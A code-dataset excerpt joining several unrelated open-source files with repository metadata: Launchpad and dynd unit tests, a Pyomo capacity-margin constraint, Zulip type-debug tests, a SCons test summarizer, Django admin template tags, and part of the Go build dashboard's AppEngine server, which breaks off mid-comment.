| gpl-3.0 | 3,046,816,515,218,756,600 | 43.23741 | 79 | 0.547081 | false |
abramhindle/UnnaturalCodeFork | python/testdata/launchpad/lib/lp/soyuz/tests/test_archive_agent.py | 1 | 1395 | # Copyright 2010-2012 Canonical Ltd. This software is licensed under the GNU
# Affero General Public License version 3 (see the file LICENSE).
"""Test Archive software center agent celebrity."""
from zope.component import getUtility
from lp.app.interfaces.launchpad import ILaunchpadCelebrities
from lp.testing import (
celebrity_logged_in,
person_logged_in,
TestCaseWithFactory,
)
from lp.testing.layers import DatabaseFunctionalLayer
class TestSoftwareCenterAgent(TestCaseWithFactory):
layer = DatabaseFunctionalLayer
def test_getArchiveSubscriptionURL(self):
# The software center agent can get subscription URLs for any
# archive that it's an owner of.
owner = self.factory.makePerson()
agent = getUtility(ILaunchpadCelebrities).software_center_agent
ppa_owner = self.factory.makeTeam(members=[owner, agent])
ppa = self.factory.makeArchive(owner=ppa_owner, private=True)
person = self.factory.makePerson()
with celebrity_logged_in('software_center_agent') as agent:
sources = person.getArchiveSubscriptionURL(agent, ppa)
with person_logged_in(ppa.owner):
authtoken = ppa.getAuthToken(person).token
url = ppa.archive_url.split('http://')[1]
new_url = "http://%s:%s@%s" % (person.name, authtoken, url)
self.assertEqual(sources, new_url)
| agpl-3.0 | 359,916,961,174,090,050 | 38.857143 | 77 | 0.706093 | false |
ContinuumIO/dynd-python | dynd/ndt/test/test_dtype.py | 5 | 8514 | import sys
import ctypes
import unittest
from dynd import ndt
class TestType(unittest.TestCase):
def test_tuple(self):
tp = ndt.tuple(ndt.int32, ndt.float64)
def test_struct(self):
tp = ndt.struct(x = ndt.int32, y = ndt.float64)
def test_callable(self):
tp = ndt.callable(ndt.void, ndt.int32, ndt.float64, x = ndt.complex128)
class TestTypeFor(unittest.TestCase):
def test_bool(self):
self.assertEqual(ndt.bool, ndt.type_for(True))
self.assertEqual(ndt.bool, ndt.type_for(False))
def test_int(self):
self.assertEqual(ndt.int32, ndt.type_for(0))
self.assertEqual(ndt.int32, ndt.type_for(1))
self.assertEqual(ndt.int32, ndt.type_for(7))
def test_float(self):
pass
class TestDType(unittest.TestCase):
def test_bool_type_properties(self):
self.assertEqual(type(ndt.bool), ndt.type)
self.assertEqual(str(ndt.bool), 'bool')
self.assertEqual(ndt.bool.data_size, 1)
self.assertEqual(ndt.bool.data_alignment, 1)
def test_int_type_properties(self):
self.assertEqual(type(ndt.int8), ndt.type)
self.assertEqual(str(ndt.int8), 'int8')
self.assertEqual(ndt.int8.data_size, 1)
self.assertEqual(ndt.int8.data_alignment, 1)
self.assertEqual(type(ndt.int16), ndt.type)
self.assertEqual(str(ndt.int16), 'int16')
self.assertEqual(ndt.int16.data_size, 2)
self.assertEqual(ndt.int16.data_alignment, 2)
self.assertEqual(type(ndt.int32), ndt.type)
self.assertEqual(str(ndt.int32), 'int32')
self.assertEqual(ndt.int32.data_size, 4)
self.assertEqual(ndt.int32.data_alignment, 4)
self.assertEqual(type(ndt.int64), ndt.type)
self.assertEqual(str(ndt.int64), 'int64')
self.assertEqual(ndt.int64.data_size, 8)
self.assertTrue(ndt.int64.data_alignment in [4,8])
self.assertEqual(type(ndt.intptr), ndt.type)
if ctypes.sizeof(ctypes.c_void_p) == 4:
self.assertEqual(str(ndt.intptr), 'int32')
self.assertEqual(ndt.intptr.data_size, 4)
self.assertEqual(ndt.intptr.data_alignment, 4)
else:
self.assertEqual(str(ndt.intptr), 'int64')
self.assertEqual(ndt.intptr.data_size, 8)
self.assertEqual(ndt.intptr.data_alignment, 8)
def test_uint_type_properties(self):
self.assertEqual(type(ndt.uint8), ndt.type)
self.assertEqual(str(ndt.uint8), 'uint8')
self.assertEqual(ndt.uint8.data_size, 1)
self.assertEqual(ndt.uint8.data_alignment, 1)
self.assertEqual(type(ndt.uint16), ndt.type)
self.assertEqual(str(ndt.uint16), 'uint16')
self.assertEqual(ndt.uint16.data_size, 2)
self.assertEqual(ndt.uint16.data_alignment, 2)
self.assertEqual(type(ndt.uint32), ndt.type)
self.assertEqual(str(ndt.uint32), 'uint32')
self.assertEqual(ndt.uint32.data_size, 4)
self.assertEqual(ndt.uint32.data_alignment, 4)
self.assertEqual(type(ndt.uint64), ndt.type)
self.assertEqual(str(ndt.uint64), 'uint64')
self.assertEqual(ndt.uint64.data_size, 8)
self.assertTrue(ndt.uint64.data_alignment in [4,8])
self.assertEqual(type(ndt.uintptr), ndt.type)
if ctypes.sizeof(ctypes.c_void_p) == 4:
self.assertEqual(str(ndt.uintptr), 'uint32')
self.assertEqual(ndt.uintptr.data_size, 4)
self.assertEqual(ndt.uintptr.data_alignment, 4)
else:
self.assertEqual(str(ndt.uintptr), 'uint64')
self.assertEqual(ndt.uintptr.data_size, 8)
self.assertEqual(ndt.uintptr.data_alignment, 8)
def test_float_type_properties(self):
self.assertEqual(type(ndt.float32), ndt.type)
self.assertEqual(str(ndt.float32), 'float32')
self.assertEqual(ndt.float32.data_size, 4)
self.assertEqual(ndt.float32.data_alignment, 4)
self.assertEqual(type(ndt.float64), ndt.type)
self.assertEqual(str(ndt.float64), 'float64')
self.assertEqual(ndt.float64.data_size, 8)
self.assertTrue(ndt.float64.data_alignment in [4,8])
def test_complex_type_properties(self):
self.assertEqual(type(ndt.complex_float32), ndt.type)
self.assertEqual(str(ndt.complex_float32), 'complex[float32]')
self.assertEqual(ndt.complex_float32.data_size, 8)
self.assertEqual(ndt.complex_float32.data_alignment, 4)
self.assertEqual(type(ndt.complex_float64), ndt.type)
self.assertEqual(str(ndt.complex_float64), 'complex[float64]')
self.assertEqual(ndt.complex_float64.data_size, 16)
self.assertTrue(ndt.complex_float64.data_alignment in [4,8])
def test_fixed_string_type_properties(self):
d = ndt.make_fixed_string(10, 'ascii')
self.assertEqual(str(d), "fixed_string[10, 'ascii']")
self.assertEqual(d.data_size, 10)
self.assertEqual(d.data_alignment, 1)
# self.assertEqual(d.encoding, 'ascii')
d = ndt.make_fixed_string(10, 'ucs2')
self.assertEqual(str(d), "fixed_string[10, 'ucs2']")
self.assertEqual(d.data_size, 20)
self.assertEqual(d.data_alignment, 2)
# self.assertEqual(d.encoding, 'ucs2')
d = ndt.make_fixed_string(10, 'utf8')
self.assertEqual(str(d), 'fixed_string[10]')
self.assertEqual(d.data_size, 10)
self.assertEqual(d.data_alignment, 1)
# self.assertEqual(d.encoding, 'utf8')
d = ndt.make_fixed_string(10, 'utf16')
self.assertEqual(str(d), "fixed_string[10, 'utf16']")
self.assertEqual(d.data_size, 20)
self.assertEqual(d.data_alignment, 2)
# self.assertEqual(d.encoding, 'utf16')
d = ndt.make_fixed_string(10, 'utf32')
self.assertEqual(str(d), "fixed_string[10, 'utf32']")
self.assertEqual(d.data_size, 40)
self.assertEqual(d.data_alignment, 4)
# self.assertEqual(d.encoding, 'utf32')
def test_scalar_types(self):
self.assertEqual(ndt.bool, ndt.type(bool))
self.assertEqual(ndt.int32, ndt.type(int))
self.assertEqual(ndt.float64, ndt.type(float))
self.assertEqual(ndt.complex_float64, ndt.type(complex))
self.assertEqual(ndt.string, ndt.type(str))
self.assertEqual(ndt.bytes, ndt.type(bytearray))
if sys.version_info[0] == 2:
self.assertEqual(ndt.string, ndt.type(unicode))
if sys.version_info[0] >= 3:
self.assertEqual(ndt.bytes, ndt.type(bytes))
def test_fixed_bytes_type(self):
d = ndt.make_fixed_bytes(4, 4)
self.assertEqual(str(d), 'fixed_bytes[4, align=4]')
self.assertEqual(d.data_size, 4)
self.assertEqual(d.data_alignment, 4)
d = ndt.make_fixed_bytes(9, 1)
self.assertEqual(str(d), 'fixed_bytes[9]')
self.assertEqual(d.data_size, 9)
self.assertEqual(d.data_alignment, 1)
# Alignment must not be greater than data_size
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 1, 2)
# Alignment must be a power of 2
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 6, 3)
# Alignment must divide into the data_size
self.assertRaises(RuntimeError, ndt.make_fixed_bytes, 6, 4)
def test_cstruct_type(self):
self.assertFalse(ndt.type('{x: int32}') == ndt.type('{y: int32}'))
def test_callable_type(self):
tp = ndt.callable(ndt.int32, ndt.float64)
def test_struct_type(self):
tp = ndt.make_struct([ndt.int32, ndt.int64], ['x', 'y'])
self.assertTrue(tp.field_types, [ndt.int32, ndt.int64])
self.assertTrue(tp.field_names, ['x', 'y'])
self.assertEqual(tp.arrmeta_size, 2 * ctypes.sizeof(ctypes.c_void_p))
self.assertTrue(tp.data_size is None)
def test_tuple_type(self):
tp = ndt.type('(int32, int64)')
self.assertTrue(tp.field_types, [ndt.int32, ndt.int64])
self.assertEqual(tp.arrmeta_size, 2 * ctypes.sizeof(ctypes.c_void_p))
self.assertTrue(tp.data_size is None)
def test_type_shape(self):
# The shape attribute of ndt.type
tp = ndt.type('3 * 4 * int32')
self.assertEqual(tp.shape, (3, 4))
tp = ndt.type('Fixed * 3 * var * int32')
self.assertEqual(tp.shape, (-1, 3, -1))
tp = ndt.type('var * 3 * 2 * int32')
self.assertEqual(tp.shape, (-1, 3, 2))
if __name__ == '__main__':
unittest.main(verbosity=2)
| bsd-2-clause | -8,403,474,971,097,990,000 | 39.350711 | 79 | 0.633192 | false |
OCM-Lab-PUC/switch-chile | switch_mod/Chile/capacity_margin.py | 1 | 1848 | from pyomo.environ import *
def define_components(mod):
"""
Add the planning reserve factor for capacity
This is just a translation of the AMPL code.
I assume there are no storage projects and that
flexible baseload plants are dispatchable.
TODO:
-Test this.
-Add a loading module for the capacity_reserve_margin parameter
-There is a bug: new projects rise errors because they are not defined in early tps
"""
mod.capacity_reserve_margin = Param(within = NonNegativeReals, default = 0.15)
mod.Capacity_Reserves = Constraint(
mod.LOAD_ZONES,
mod.TIMEPOINTS,
rule = lambda m, lz, t: (
m.lz_demand_mw[lz, t] * (1 + m.capacity_reserve_margin) * (1 + m.distribution_loss_rate)
<=
sum(m.ProjCapacityTP[proj, t] * m.proj_max_capacity_factor[proj, t]
for proj in m.VARIABLE_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.ProjCapacityTP[proj, t] * (1 - m.proj_scheduled_outage_rate[proj])
for proj in m.BASELOAD_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.ProjCapacityTP[proj, t]
for proj in m.DISPATCHABLE_PROJECTS if m.proj_load_zone[proj] == lz
and (proj, m.tp_period[t]) in m.PROJECT_OPERATIONAL_PERIODS) +
sum(m.TxPowerReceived[lz_from, lz_to, tp]
for (lz_from, lz_to, tp) in m.TRANS_TIMEPOINTS
if lz_to == lz and tp == t) -
sum(m.TxPowerSent[lz_from, lz_to, tp]
for (lz_from, lz_to, tp) in m.TRANS_TIMEPOINTS
if lz_from == lz and tp == t)
)) | apache-2.0 | 2,931,847,859,504,690,000 | 44.25 | 100 | 0.579545 | false |
niftynei/zulip | zerver/tests/test_type_debug.py | 15 | 5086 | from __future__ import print_function
import sys
from unittest import TestCase
from six.moves import cStringIO as StringIO
from zerver.lib.type_debug import print_types
from typing import Any, Callable, Dict, Iterable, Tuple, TypeVar
T = TypeVar('T')
def add(x=0, y=0):
# type: (Any, Any) -> Any
return x + y
def to_dict(l=[]):
# type: (Iterable[Tuple[Any, Any]]) -> Dict[Any, Any]
return dict(l)
class TypesPrintTest(TestCase):
# These 2 methods are needed to run tests with our custom test-runner
def _pre_setup(self):
# type: () -> None
pass
def _post_teardown(self):
# type: () -> None
pass
def check_signature(self, signature, retval, func, *args, **kwargs):
# type: (str, T, Callable[..., T], *Any, **Any) -> None
"""
Checks if print_types outputs `signature` when func is called with *args and **kwargs.
Do not decorate func with print_types before passing into this function.
func will be decorated with print_types within this function.
"""
try:
original_stdout = sys.stdout
sys.stdout = StringIO()
self.assertEqual(retval, print_types(func)(*args, **kwargs))
self.assertEqual(sys.stdout.getvalue().strip(), signature)
finally:
sys.stdout = original_stdout
def test_empty(self):
# type: () -> None
def empty_func():
# type: () -> None
pass
self.check_signature("empty_func() -> None", None, empty_func) # type: ignore # https://github.com/python/mypy/issues/1932
self.check_signature("<lambda>() -> None", None, (lambda: None)) # type: ignore # https://github.com/python/mypy/issues/1932
def test_basic(self):
# type: () -> None
self.check_signature("add(float, int) -> float",
5.0, add, 2.0, 3)
self.check_signature("add(float, y=int) -> float",
5.0, add, 2.0, y=3)
self.check_signature("add(x=int) -> int", 2, add, x=2)
self.check_signature("add() -> int", 0, add)
def test_list(self):
# type: () -> None
self.check_signature("add([], [str]) -> [str]",
['two'], add, [], ['two'])
self.check_signature("add([int], [str]) -> [int, ...]",
[2, 'two'], add, [2], ['two'])
self.check_signature("add([int, ...], y=[]) -> [int, ...]",
[2, 'two'], add, [2, 'two'], y=[])
def test_dict(self):
# type: () -> None
self.check_signature("to_dict() -> {}", {}, to_dict)
self.check_signature("to_dict([(int, str)]) -> {int: str}",
{2: 'two'}, to_dict, [(2, 'two')])
self.check_signature("to_dict(((int, str),)) -> {int: str}",
{2: 'two'}, to_dict, ((2, 'two'),))
self.check_signature("to_dict([(int, str), ...]) -> {int: str, ...}",
{1: 'one', 2: 'two'}, to_dict, [(1, 'one'), (2, 'two')])
def test_tuple(self):
# type: () -> None
self.check_signature("add((), ()) -> ()",
(), add, (), ())
self.check_signature("add((int,), (str,)) -> (int, str)",
(1, 'one'), add, (1,), ('one',))
self.check_signature("add(((),), ((),)) -> ((), ())",
((), ()), add, ((),), ((),))
def test_class(self):
# type: () -> None
class A(object):
pass
class B(str):
pass
self.check_signature("<lambda>(A) -> str", 'A', (lambda x: x.__class__.__name__), A())
self.check_signature("<lambda>(B) -> int", 5, (lambda x: len(x)), B("hello"))
def test_sequence(self):
# type: () -> None
class A(list):
pass
class B(list):
pass
self.check_signature("add(A([]), B([str])) -> [str]",
['two'], add, A([]), B(['two']))
self.check_signature("add(A([int]), B([str])) -> [int, ...]",
[2, 'two'], add, A([2]), B(['two']))
self.check_signature("add(A([int, ...]), y=B([])) -> [int, ...]",
[2, 'two'], add, A([2, 'two']), y=B([]))
def test_mapping(self):
# type: () -> None
class A(dict):
pass
def to_A(l=[]):
# type: (Iterable[Tuple[Any, Any]]) -> A
return A(l)
self.check_signature("to_A() -> A([])", A(()), to_A)
self.check_signature("to_A([(int, str)]) -> A([(int, str)])",
{2: 'two'}, to_A, [(2, 'two')])
self.check_signature("to_A([(int, str), ...]) -> A([(int, str), ...])",
{1: 'one', 2: 'two'}, to_A, [(1, 'one'), (2, 'two')])
self.check_signature("to_A(((int, str), (int, str))) -> A([(int, str), ...])",
{1: 'one', 2: 'two'}, to_A, ((1, 'one'), (2, 'two')))
| apache-2.0 | -1,924,752,163,495,212,000 | 37.240602 | 132 | 0.451435 | false |
WellDone/pymomo | pymomo/config/site_scons/test_summary.py | 2 | 1801 | import os.path
def build_summary_cmd(target, source, env):
"""
Build a text file with the status results for all of the unit tests in sources.
sources should point to an array of strings corresponding to .status files.
"""
some_failed = False
targets = {}
for node in source:
path = str(node)
name, targ, ext = parse_name(path)
if ext != '.status':
print "Ignoring non-status file %s, this file should not be in this list" % path
if targ not in targets:
targets[targ] = []
targets[targ].append((name, path))
with open(str(target[0]), 'w') as f:
f.write('Test Summary\n')
for targ, tests in targets.iteritems():
num_tests = len(tests)
results = map(lambda x: test_passed(x[1]), tests)
tagged_tests = zip(tests, results)
failed = filter(lambda x: x[1] == False, tagged_tests)
passed = filter(lambda x: x[1] == True, tagged_tests)
num_passed = len(passed)
if num_passed != num_tests:
some_failed = True
f.write("\n## Target %s ##\n" % targ)
f.write("%d/%d tests passed (%d%% pass rate)\n" % (num_passed, num_tests, (num_passed*100/num_tests)))
for fail in failed:
f.write("Test %s FAILED\n" % fail[0][0])
with open(str(target[0]), "r") as f:
for line in f.readlines():
print line.rstrip()
#Raise a build error if some tests failed
if some_failed:
return 1
def test_passed(path):
with open(path, 'r') as f:
contents = f.read()
result = contents.lstrip().rstrip()
if result == 'PASSED':
return True
elif result == 'FAILED':
return False
else:
raise ValueError('Invalid value in test status file %s, contents were %s' %(path, result))
def parse_name(path):
base = os.path.basename(path)
(name, ext) = os.path.splitext(base)
(name, target) = name.split('@', 1)
return (name, target, ext) | lgpl-3.0 | 3,122,456,705,946,558,500 | 23.684932 | 105 | 0.646863 | false |
toomoresuch/pysonengine | parts/google_appengine/lib/django/django/contrib/admin/templatetags/admin_modify.py | 32 | 10224 | from django import template
from django.contrib.admin.views.main import AdminBoundField
from django.template import loader
from django.utils.text import capfirst
from django.db import models
from django.db.models.fields import Field
from django.db.models.related import BoundRelatedObject
from django.conf import settings
import re
register = template.Library()
word_re = re.compile('[A-Z][a-z]+')
absolute_url_re = re.compile(r'^(?:http(?:s)?:/)?/', re.IGNORECASE)
def class_name_to_underscored(name):
return '_'.join([s.lower() for s in word_re.findall(name)[:-1]])
def include_admin_script(script_path):
"""
Returns an HTML script element for including a script from the admin
media url (or other location if an absolute url is given).
Example usage::
{% include_admin_script "js/calendar.js" %}
could return::
<script type="text/javascript" src="/media/admin/js/calendar.js">
"""
if not absolute_url_re.match(script_path):
script_path = '%s%s' % (settings.ADMIN_MEDIA_PREFIX, script_path)
return '<script type="text/javascript" src="%s"></script>' % script_path
include_admin_script = register.simple_tag(include_admin_script)
def submit_row(context):
opts = context['opts']
change = context['change']
is_popup = context['is_popup']
return {
'onclick_attrib': (opts.get_ordered_objects() and change
and 'onclick="submitOrderForm();"' or ''),
'show_delete_link': (not is_popup and context['has_delete_permission']
and (change or context['show_delete'])),
'show_save_as_new': not is_popup and change and opts.admin.save_as,
'show_save_and_add_another': not is_popup and (not opts.admin.save_as or context['add']),
'show_save_and_continue': not is_popup and context['has_change_permission'],
'show_save': True
}
submit_row = register.inclusion_tag('admin/submit_line.html', takes_context=True)(submit_row)
def field_label(bound_field):
class_names = []
if isinstance(bound_field.field, models.BooleanField):
class_names.append("vCheckboxLabel")
colon = ""
else:
if not bound_field.field.blank:
class_names.append('required')
if not bound_field.first:
class_names.append('inline')
colon = ":"
class_str = class_names and ' class="%s"' % ' '.join(class_names) or ''
return '<label for="%s"%s>%s%s</label> ' % (bound_field.element_id, class_str, \
capfirst(bound_field.field.verbose_name), colon)
field_label = register.simple_tag(field_label)
class FieldWidgetNode(template.Node):
nodelists = {}
default = None
def __init__(self, bound_field_var):
self.bound_field_var = bound_field_var
def get_nodelist(cls, klass):
if not cls.nodelists.has_key(klass):
try:
field_class_name = klass.__name__
template_name = "widget/%s.html" % class_name_to_underscored(field_class_name)
nodelist = loader.get_template(template_name).nodelist
except template.TemplateDoesNotExist:
super_klass = bool(klass.__bases__) and klass.__bases__[0] or None
if super_klass and super_klass != Field:
nodelist = cls.get_nodelist(super_klass)
else:
if not cls.default:
cls.default = loader.get_template("widget/default.html").nodelist
nodelist = cls.default
cls.nodelists[klass] = nodelist
return nodelist
else:
return cls.nodelists[klass]
get_nodelist = classmethod(get_nodelist)
def render(self, context):
bound_field = template.resolve_variable(self.bound_field_var, context)
context.push()
context['bound_field'] = bound_field
output = self.get_nodelist(bound_field.field.__class__).render(context)
context.pop()
return output
class FieldWrapper(object):
def __init__(self, field ):
self.field = field
def needs_header(self):
return not isinstance(self.field, models.AutoField)
def header_class_attribute(self):
return self.field.blank and ' class="optional"' or ''
def use_raw_id_admin(self):
return isinstance(self.field.rel, (models.ManyToOneRel, models.ManyToManyRel)) \
and self.field.rel.raw_id_admin
class FormFieldCollectionWrapper(object):
def __init__(self, field_mapping, fields, index):
self.field_mapping = field_mapping
self.fields = fields
self.bound_fields = [AdminBoundField(field, self.field_mapping, field_mapping['original'])
for field in self.fields]
self.index = index
class TabularBoundRelatedObject(BoundRelatedObject):
def __init__(self, related_object, field_mapping, original):
super(TabularBoundRelatedObject, self).__init__(related_object, field_mapping, original)
self.field_wrapper_list = [FieldWrapper(field) for field in self.relation.editable_fields()]
fields = self.relation.editable_fields()
self.form_field_collection_wrappers = [FormFieldCollectionWrapper(field_mapping, fields, i)
for (i,field_mapping) in self.field_mappings.items() ]
self.original_row_needed = max([fw.use_raw_id_admin() for fw in self.field_wrapper_list])
self.show_url = original and hasattr(self.relation.opts, 'get_absolute_url')
def template_name(self):
return "admin/edit_inline_tabular.html"
class StackedBoundRelatedObject(BoundRelatedObject):
def __init__(self, related_object, field_mapping, original):
super(StackedBoundRelatedObject, self).__init__(related_object, field_mapping, original)
fields = self.relation.editable_fields()
self.field_mappings.fill()
self.form_field_collection_wrappers = [FormFieldCollectionWrapper(field_mapping ,fields, i)
for (i,field_mapping) in self.field_mappings.items()]
self.show_url = original and hasattr(self.relation.opts, 'get_absolute_url')
def template_name(self):
return "admin/edit_inline_stacked.html"
class EditInlineNode(template.Node):
def __init__(self, rel_var):
self.rel_var = rel_var
def render(self, context):
relation = template.resolve_variable(self.rel_var, context)
context.push()
if relation.field.rel.edit_inline == models.TABULAR:
bound_related_object_class = TabularBoundRelatedObject
elif relation.field.rel.edit_inline == models.STACKED:
bound_related_object_class = StackedBoundRelatedObject
else:
bound_related_object_class = relation.field.rel.edit_inline
original = context.get('original', None)
bound_related_object = relation.bind(context['form'], original, bound_related_object_class)
context['bound_related_object'] = bound_related_object
t = loader.get_template(bound_related_object.template_name())
output = t.render(context)
context.pop()
return output
def output_all(form_fields):
return ''.join([str(f) for f in form_fields])
output_all = register.simple_tag(output_all)
def auto_populated_field_script(auto_pop_fields, change = False):
t = []
for field in auto_pop_fields:
if change:
t.append('document.getElementById("id_%s")._changed = true;' % field.name)
else:
t.append('document.getElementById("id_%s").onchange = function() { this._changed = true; };' % field.name)
add_values = ' + " " + '.join(['document.getElementById("id_%s").value' % g for g in field.prepopulate_from])
for f in field.prepopulate_from:
t.append('document.getElementById("id_%s").onkeyup = function() {' \
' var e = document.getElementById("id_%s");' \
' if(!e._changed) { e.value = URLify(%s, %s);} }; ' % (
f, field.name, add_values, field.maxlength))
return ''.join(t)
auto_populated_field_script = register.simple_tag(auto_populated_field_script)
def filter_interface_script_maybe(bound_field):
f = bound_field.field
if f.rel and isinstance(f.rel, models.ManyToManyRel) and f.rel.filter_interface:
return '<script type="text/javascript">addEvent(window, "load", function(e) {' \
' SelectFilter.init("id_%s", "%s", %s, "%s"); });</script>\n' % (
f.name, f.verbose_name.replace('"', '\\"'), f.rel.filter_interface-1, settings.ADMIN_MEDIA_PREFIX)
else:
return ''
filter_interface_script_maybe = register.simple_tag(filter_interface_script_maybe)
def field_widget(parser, token):
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError, "%s takes 1 argument" % bits[0]
return FieldWidgetNode(bits[1])
field_widget = register.tag(field_widget)
def edit_inline(parser, token):
bits = token.contents.split()
if len(bits) != 2:
raise template.TemplateSyntaxError, "%s takes 1 argument" % bits[0]
return EditInlineNode(bits[1])
edit_inline = register.tag(edit_inline)
def admin_field_line(context, argument_val):
if isinstance(argument_val, AdminBoundField):
bound_fields = [argument_val]
else:
bound_fields = [bf for bf in argument_val]
add = context['add']
change = context['change']
class_names = ['form-row']
for bound_field in bound_fields:
for f in bound_field.form_fields:
if f.errors():
class_names.append('errors')
break
# Assumes BooleanFields won't be stacked next to each other!
if isinstance(bound_fields[0].field, models.BooleanField):
class_names.append('checkbox-row')
return {
'add': context['add'],
'change': context['change'],
'bound_fields': bound_fields,
'class_names': " ".join(class_names),
}
admin_field_line = register.inclusion_tag('admin/field_line.html', takes_context=True)(admin_field_line)
| mit | 2,964,084,063,973,223,000 | 40.392713 | 118 | 0.634781 | false |
ssrl/go | misc/dashboard/godashboard/gobuild.py | 3 | 17794 | # Copyright 2009 The Go Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
# This is the server part of the continuous build system for Go. It must be run
# by AppEngine.
from django.utils import simplejson
from google.appengine.api import mail
from google.appengine.api import memcache
from google.appengine.ext import db
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
import datetime
import hashlib
import logging
import os
import re
import bz2
# local imports
from auth import auth
import const
# The majority of our state are commit objects. One of these exists for each of
# the commits known to the build system. Their key names are of the form
# <commit number (%08x)> "-" <hg hash>. This means that a sorting by the key
# name is sufficient to order the commits.
#
# The commit numbers are purely local. They need not match up to the commit
# numbers in an hg repo. When inserting a new commit, the parent commit must be
# given and this is used to generate the new commit number. In order to create
# the first Commit object, a special command (/init) is used.
class Commit(db.Model):
num = db.IntegerProperty() # internal, monotonic counter.
node = db.StringProperty() # Hg hash
parentnode = db.StringProperty() # Hg hash
user = db.StringProperty()
date = db.DateTimeProperty()
desc = db.BlobProperty()
# This is the list of builds. Each element is a string of the form <builder
# name> '`' <log hash>. If the log hash is empty, then the build was
# successful.
builds = db.StringListProperty()
fail_notification_sent = db.BooleanProperty()
# A CompressedLog contains the textual build log of a failed build.
# The key name is the hex digest of the SHA256 hash of the contents.
# The contents is bz2 compressed.
class CompressedLog(db.Model):
log = db.BlobProperty()
N = 30
def builderInfo(b):
f = b.split('-', 3)
goos = f[0]
goarch = f[1]
note = ""
if len(f) > 2:
note = f[2]
return {'name': b, 'goos': goos, 'goarch': goarch, 'note': note}
def builderset():
q = Commit.all()
q.order('-__key__')
results = q.fetch(N)
builders = set()
for c in results:
builders.update(set(parseBuild(build)['builder'] for build in c.builds))
return builders
class MainPage(webapp.RequestHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/html; charset=utf-8'
try:
page = int(self.request.get('p', 1))
if not page > 0:
raise
except:
page = 1
try:
num = int(self.request.get('n', N))
if num <= 0 or num > 200:
raise
except:
num = N
offset = (page-1) * num
q = Commit.all()
q.order('-__key__')
results = q.fetch(num, offset)
revs = [toRev(r) for r in results]
builders = {}
for r in revs:
for b in r['builds']:
builders[b['builder']] = builderInfo(b['builder'])
for r in revs:
have = set(x['builder'] for x in r['builds'])
need = set(builders.keys()).difference(have)
for n in need:
r['builds'].append({'builder': n, 'log':'', 'ok': False})
r['builds'].sort(cmp = byBuilder)
builders = list(builders.items())
builders.sort()
values = {"revs": revs, "builders": [v for k,v in builders]}
values['num'] = num
values['prev'] = page - 1
if len(results) == num:
values['next'] = page + 1
path = os.path.join(os.path.dirname(__file__), 'main.html')
self.response.out.write(template.render(path, values))
# A DashboardHandler is a webapp.RequestHandler but provides
# authenticated_post - called by post after authenticating
# json - writes object in json format to response output
class DashboardHandler(webapp.RequestHandler):
def post(self):
if not auth(self.request):
self.response.set_status(403)
return
self.authenticated_post()
def authenticated_post(self):
return
def json(self, obj):
self.response.set_status(200)
simplejson.dump(obj, self.response.out)
return
# Todo serves /todo. It tells the builder which commits need to be built.
class Todo(DashboardHandler):
def get(self):
builder = self.request.get('builder')
key = 'todo-%s' % builder
response = memcache.get(key)
if response is None:
# Fell out of memcache. Rebuild from datastore results.
# We walk the commit list looking for nodes that have not
# been built by this builder.
q = Commit.all()
q.order('-__key__')
todo = []
first = None
for c in q.fetch(N+1):
if first is None:
first = c
if not built(c, builder):
todo.append({'Hash': c.node})
response = simplejson.dumps(todo)
memcache.set(key, response, 3600)
self.response.set_status(200)
self.response.out.write(response)
def built(c, builder):
for b in c.builds:
if b.startswith(builder+'`'):
return True
return False
# Log serves /log/. It retrieves log data by content hash.
class LogHandler(DashboardHandler):
def get(self):
self.response.headers['Content-Type'] = 'text/plain; charset=utf-8'
hash = self.request.path[5:]
l = CompressedLog.get_by_key_name(hash)
if l is None:
self.response.set_status(404)
return
log = bz2.decompress(l.log)
self.response.set_status(200)
self.response.out.write(log)
# Init creates the commit with id 0. Since this commit doesn't have a parent,
# it cannot be created by Build.
class Init(DashboardHandler):
def authenticated_post(self):
date = parseDate(self.request.get('date'))
node = self.request.get('node')
if not validNode(node) or date is None:
logging.error("Not valid node ('%s') or bad date (%s %s)", node, date, self.request.get('date'))
self.response.set_status(500)
return
commit = Commit(key_name = '00000000-%s' % node)
commit.num = 0
commit.node = node
commit.parentnode = ''
commit.user = self.request.get('user').encode('utf8')
commit.date = date
commit.desc = self.request.get('desc').encode('utf8')
commit.put()
self.response.set_status(200)
# The last commit when we switched to using entity groups.
# This is the root of the new commit entity group.
RootCommitKeyName = '00000f26-f32c6f1038207c55d5780231f7484f311020747e'
# CommitHandler serves /commit.
# A GET of /commit retrieves information about the specified commit.
# A POST of /commit creates a node for the given commit.
# If the commit already exists, the POST silently succeeds (like mkdir -p).
class CommitHandler(DashboardHandler):
def get(self):
node = self.request.get('node')
if not validNode(node):
return self.json({'Status': 'FAIL', 'Error': 'malformed node hash'})
n = nodeByHash(node)
if n is None:
return self.json({'Status': 'FAIL', 'Error': 'unknown revision'})
return self.json({'Status': 'OK', 'Node': nodeObj(n)})
def authenticated_post(self):
# Require auth with the master key, not a per-builder key.
if self.request.get('builder'):
self.response.set_status(403)
return
node = self.request.get('node')
date = parseDate(self.request.get('date'))
user = self.request.get('user').encode('utf8')
desc = self.request.get('desc').encode('utf8')
parenthash = self.request.get('parent')
if not validNode(node) or not validNode(parenthash) or date is None:
return self.json({'Status': 'FAIL', 'Error': 'malformed node, parent, or date'})
n = nodeByHash(node)
if n is None:
p = nodeByHash(parenthash)
if p is None:
return self.json({'Status': 'FAIL', 'Error': 'unknown parent'})
# Want to create new node in a transaction so that multiple
# requests creating it do not collide and so that multiple requests
# creating different nodes get different sequence numbers.
# All queries within a transaction must include an ancestor,
# but the original datastore objects we used for the dashboard
# have no common ancestor. Instead, we use a well-known
# root node - the last one before we switched to entity groups -
# as the as the common ancestor.
root = Commit.get_by_key_name(RootCommitKeyName)
def add_commit():
if nodeByHash(node, ancestor=root) is not None:
return
# Determine number for this commit.
# Once we have created one new entry it will be lastRooted.num+1,
# but the very first commit created in this scheme will have to use
